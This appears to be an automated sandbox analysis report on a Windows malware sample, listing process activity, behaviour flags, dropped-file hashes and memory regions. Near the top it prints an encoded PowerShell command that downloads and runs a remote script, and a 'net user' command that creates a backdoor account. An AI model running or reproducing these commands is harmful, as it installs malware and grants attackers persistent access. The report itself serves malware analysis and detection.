C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESAC53.tmpMD5
c7b68b111e87d34fa2d465c659719179
SHA18bb9d5b5690b55ca13e15b86e4b7229e6833941f
SHA2563a8e95480468bd40ff6f88ea6317c3ad01bf986fe5d2b393a29e9a6fedd09730
SHA51287d90026930f881af79292f200b897db696ab0d7d3dac6d72682c013f6da76502782f8608a05f86c5d2d297e9feebc45f6ea8b0e244705ad2a45a88fffac6e3c
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
C:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.dllMD5
98bee00a697c41993ad40b7d9cf4736e
SHA13392807b8aaece64992db5c17273fc2140f3779d
SHA256eeb288ca161e698c050e72c65771f107ceb07440d82eb83d47490349de059279
SHA5123583a776cd0be2fbfe34ae2d76466ee2458f1f82ebe5a501009c78e08a3b754e9b469f92e2c9c8e905f146918429136cc4555a8faa0532d142f43118db412943
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\CSC29E85CA2AA6F4C6ABF3767A694F2658A.TMPMD5
141b15e759b3312958cb6ce32f916f5b
SHA1375e9d1a036f7d7ff111fd79006de6f5f9e74a9c
SHA2563cf77bdca29501c5e3ec32c857ea82a43dfe9b1ad624eb16609e2296af617c0e
SHA5120ebf0f0284324af8e6b65f3f81b177d30a2501ba9bcd5fc65231e24b34eb2ee1c72a4c7031e6b8b6c8722ddcdef36da290d9b9f4244dc6c3ae615b1e24b77e33
-
\??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.cmdlineMD5
f3f94e29ae2114b6b614c24f41170b93
SHA154b9b33c6f75f4b737d36ff00a9bf734ac6f070f
SHA256cd1dddc3bcc64999a4874e00aeb492d56439e1127843c0eb0af27bf847b272f8
SHA512c3829b864c25dcd10c2be1211ad78c9aae75a2ee18e8894236bddf23d97e159d7efa1010574c17a1f5df6a02e63c38fee30bd876fce6749ba31c194a6dafb820
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/200-238-0x0000000000000000-mapping.dmp
-
memory/416-231-0x0000000000000000-mapping.dmp
-
memory/504-213-0x0000000000000000-mapping.dmp
-
memory/728-211-0x0000000000000000-mapping.dmp
-
memory/736-116-0x000001F26E190000-0x000001F26E192000-memory.dmpFilesize
8KB
-
memory/736-119-0x000001F26E196000-0x000001F26E197000-memory.dmpFilesize
4KB
-
memory/736-118-0x000001F26E195000-0x000001F26E196000-memory.dmpFilesize
4KB
-
memory/736-117-0x000001F26E193000-0x000001F26E195000-memory.dmpFilesize
8KB
-
memory/736-114-0x000001F2706A0000-0x000001F270AC1000-memory.dmpFilesize
4.1MB
-
memory/776-222-0x0000000000000000-mapping.dmp
-
memory/780-218-0x0000000000000000-mapping.dmp
-
memory/1012-235-0x0000000000000000-mapping.dmp
-
memory/1060-219-0x0000000000000000-mapping.dmp
-
memory/1204-225-0x0000000000000000-mapping.dmp
-
memory/1316-140-0x0000000000000000-mapping.dmp
-
memory/1448-209-0x000001B7762D8000-0x000001B7762DA000-memory.dmpFilesize
8KB
-
memory/1448-205-0x0000000000000000-mapping.dmp
-
memory/1448-208-0x000001B7762D6000-0x000001B7762D8000-memory.dmpFilesize
8KB
-
memory/1448-207-0x000001B7762D3000-0x000001B7762D5000-memory.dmpFilesize
8KB
-
memory/1448-206-0x000001B7762D0000-0x000001B7762D2000-memory.dmpFilesize
8KB
-
memory/1496-249-0x0000000000000000-mapping.dmp
-
memory/1568-247-0x0000000000000000-mapping.dmp
-
memory/1628-167-0x000001943FB00000-0x000001943FB02000-memory.dmpFilesize
8KB
-
memory/1628-168-0x000001943FB03000-0x000001943FB05000-memory.dmpFilesize
8KB
-
memory/1628-192-0x000001943FB06000-0x000001943FB08000-memory.dmpFilesize
8KB
-
memory/1628-159-0x0000000000000000-mapping.dmp
-
memory/1628-197-0x000001943FB08000-0x000001943FB0A000-memory.dmpFilesize
8KB
-
memory/1688-234-0x0000000000000000-mapping.dmp
-
memory/1688-246-0x0000000000000000-mapping.dmp
-
memory/1968-204-0x00000277CC526000-0x00000277CC528000-memory.dmpFilesize
8KB
-
memory/1968-201-0x0000000000000000-mapping.dmp
-
memory/1968-229-0x0000000000000000-mapping.dmp
-
memory/1968-202-0x00000277CC520000-0x00000277CC522000-memory.dmpFilesize
8KB
-
memory/1968-203-0x00000277CC523000-0x00000277CC525000-memory.dmpFilesize
8KB
-
memory/2128-215-0x0000000000000000-mapping.dmp
-
memory/2248-242-0x0000019B7F410000-0x0000019B7F412000-memory.dmpFilesize
8KB
-
memory/2248-233-0x0000000000000000-mapping.dmp
-
memory/2248-244-0x0000019B7F416000-0x0000019B7F418000-memory.dmpFilesize
8KB
-
memory/2248-243-0x0000019B7F413000-0x0000019B7F415000-memory.dmpFilesize
8KB
-
memory/2248-241-0x0000000000000000-mapping.dmp
-
memory/2248-245-0x0000019B7F418000-0x0000019B7F419000-memory.dmpFilesize
4KB
-
memory/2304-217-0x0000000000000000-mapping.dmp
-
memory/2308-228-0x0000000000000000-mapping.dmp
-
memory/2380-240-0x0000000000000000-mapping.dmp
-
memory/2572-210-0x0000000000000000-mapping.dmp
-
memory/2588-220-0x0000000000000000-mapping.dmp
-
memory/2592-227-0x0000000000000000-mapping.dmp
-
memory/2832-226-0x0000000000000000-mapping.dmp
-
memory/2832-212-0x0000000000000000-mapping.dmp
-
memory/2860-130-0x0000018F777F3000-0x0000018F777F5000-memory.dmpFilesize
8KB
-
memory/2860-146-0x0000018F777F8000-0x0000018F777F9000-memory.dmpFilesize
4KB
-
memory/2860-129-0x0000018F777F0000-0x0000018F777F2000-memory.dmpFilesize
8KB
-
memory/2860-152-0x0000018F78630000-0x0000018F78631000-memory.dmpFilesize
4KB
-
memory/2860-128-0x0000018F77D50000-0x0000018F77D51000-memory.dmpFilesize
4KB
-
memory/2860-125-0x0000018F77500000-0x0000018F77501000-memory.dmpFilesize
4KB
-
memory/2860-120-0x0000000000000000-mapping.dmp
-
memory/2860-151-0x0000018F782A0000-0x0000018F782A1000-memory.dmpFilesize
4KB
-
memory/2860-139-0x0000018F777F6000-0x0000018F777F8000-memory.dmpFilesize
8KB
-
memory/2860-144-0x0000018F77790000-0x0000018F77791000-memory.dmpFilesize
4KB
-
memory/3172-221-0x0000000000000000-mapping.dmp
-
memory/3176-216-0x0000000000000000-mapping.dmp
-
memory/3364-239-0x0000000000000000-mapping.dmp
-
memory/3452-236-0x0000000000000000-mapping.dmp
-
memory/3628-214-0x0000000000000000-mapping.dmp
-
memory/3732-248-0x0000000000000000-mapping.dmp
-
memory/3812-136-0x0000000000000000-mapping.dmp
-
memory/3920-232-0x0000000000000000-mapping.dmp
-
memory/3960-230-0x0000000000000000-mapping.dmp